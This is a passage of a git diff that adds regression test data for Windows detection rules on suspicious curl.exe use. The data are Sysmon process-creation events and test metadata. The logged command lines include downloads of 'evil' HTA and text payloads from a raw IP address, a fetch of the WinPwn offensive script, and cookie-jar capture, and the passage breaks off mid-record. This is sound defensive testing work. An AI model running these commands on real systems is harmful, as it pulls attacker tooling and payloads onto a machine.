diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx new file mode 100755 index 000000000..e5eb3a054 Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx differ diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json new file mode 100644 index 000000000..af8f74405 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:22:12.568940Z" + } + }, + "EventRecordID": 21497, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:22:12.498", + "ProcessGuid": "0197231E-6314-693A-D112-000000000800", + "ProcessId": 11000, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl.exe --cookie-jar cookie \"http://example.com\"", + "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000", + "LogonId": "0x3144c", + "TerminalSessionId": 1, + "IntegrityLevel": "High", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800", + "ParentProcessId": 3476, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml new file mode 100644 index 000000000..c5dda047b --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml @@ -0,0 +1,13 @@ +id: d7f159c3-db76-4e39-b677-c0958f5f82b8 +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 5a6e1e16-07de-48d8-8aae-faa766c05e88 + title: Potential Cookies Session Hijacking +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx new file mode 100755 index 000000000..67be7e022 Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx differ diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json new file mode 100644 index 000000000..aea2fe730 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:17:19.772545Z" + } + }, + "EventRecordID": 21475, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:17:19.636", + "ProcessGuid": "0197231E-61EF-693A-C812-000000000800", + "ProcessId": 6400, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl.exe -H \"User-Agent: EvilAgent\" http://example.com", + "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000", + "LogonId": "0x3144c", + "TerminalSessionId": 1, + "IntegrityLevel": "High", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800", + "ParentProcessId": 3476, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml new file mode 100644 index 000000000..f8c2ccdc5 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml @@ -0,0 +1,13 @@ +id: 6428e458-fe2e-4936-accb-aebd0bcc8e35 +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 85de1f22-d189-44e4-8239-dc276b45379b + title: Curl Web Request With Potential Custom User-Agent +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx new file mode 100644 index 000000000..fd2796fb2 Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx differ diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json new file mode 100644 index 000000000..b33823434 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T07:02:39.732592Z" + } + }, + "EventRecordID": 21767, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 07:02:39.718", + "ProcessGuid": "0197231E-6C8F-693A-2613-000000000800", + "ProcessId": 17752, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl --output hello.txt https://12.34.56.78/hack/evil.txt", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml new file mode 100644 index 000000000..73c9feaf9 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml @@ -0,0 +1,13 @@ +id: 6aac357c-fe1d-4ca0-82e2-df626f71e838 +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218 + title: File Download From IP URL Via Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx new file mode 100755 index 000000000..09038101d Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx differ diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json new file mode 100644 index 000000000..e4493b612 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:34:20.042883Z" + } + }, + "EventRecordID": 21588, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:34:19.983", + "ProcessGuid": "0197231E-65EB-693A-F112-000000000800", + "ProcessId": 14440, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl --output benign.hta \"https://12.34.56.78/hack/evil.hta\"", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml new file mode 100644 index 000000000..2b8c8c48d --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml @@ -0,0 +1,13 @@ +id: 0f1b33fc-f97e-4469-a9ec-32ffb436f490 +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043 + title: Suspicious File Download From IP Via Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx new file mode 100755 index 000000000..bd24a3fd7 Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx differ diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json new file mode 100644 index 000000000..febe17014 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:41:38.130858Z" + } + }, + "EventRecordID": 21642, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:41:38.096", + "ProcessGuid": "0197231E-67A2-693A-FF12-000000000800", + "ProcessId": 9656, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl -O \"https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1\"", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml new file mode 100644 index 000000000..56af37248 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml @@ -0,0 +1,13 @@ +id: 68e8f5c3-5a3b-4878-82d3-24d961eb219b +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb + title: Suspicious File Download From File Sharing Domain Via Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx new file mode 100755 index 000000000..7ec40b988 Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx differ diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json new file mode 100644 index 000000000..9b6dad729 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:43:20.070938Z" + } + }, + "EventRecordID": 21651, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:43:20.052", + "ProcessGuid": "0197231E-6808-693A-0413-000000000800", + "ProcessId": 17792, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl --insecure http://example.com", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml new file mode 100644 index 000000000..1fbe99a15 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml @@ -0,0 +1,13 @@ +id: ef93f624-2b41-41ee-9596-298d3158acfb +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec + title: Insecure Transfer Via Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx new file mode 100755 index 000000000..90ebbbd66 Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx differ diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json new file mode 100644 index 000000000..69e332233 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:45:56.284330Z" + } + }, + "EventRecordID": 21680, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:45:56.239", + "ProcessGuid": "0197231E-68A4-693A-0713-000000000800", + "ProcessId": 13700, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl --proxy-insecure -p -x http://127.0.0.1:1234 --silent -v --show-error http://127.0.0.1:888/echo", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", + "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", + "ParentProcessId": 14736, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", + "ParentUser": "swachchhanda\\xodih" + } + } +} diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml new file mode 100644 index 000000000..9014d90aa --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml @@ -0,0 +1,13 @@ +id: 11dd9a12-467e-4c13-b928-7c3aea60f59f +description: N/A +date: 2025-12-11 +author: Swachchhanda Shrawan Poudel (Nextron Systems) +rule_metadata: + - id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77 + title: Insecure Proxy/DOH Transfer Via Curl.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx new file mode 100755 index 000000000..c1390aafd Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx differ diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json new file mode 100644 index 000000000..96eb7c085 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-12-11T06:51:23.281436Z" + } + }, + "EventRecordID": 21706, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3208, + "ThreadID": 1724 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "swachchhanda", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-12-11 06:51:23.255", + "ProcessGuid": "0197231E-69EB-693A-1313-000000000800", + "ProcessId": 13896, + "Image": "C:\\Windows\\System32\\curl.exe", + "FileVersion": "8.10.1", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "curl file:///C:\\Users\\xodih\\AppData\\Local\\Temp\\calc.dll", + "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", + "User": "swachchhanda\\xodih", + "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", + "LogonId": "0x317fb", + "TerminalSessionId": 1, + "IntegrityLevel": "Medium", + "Hashes": 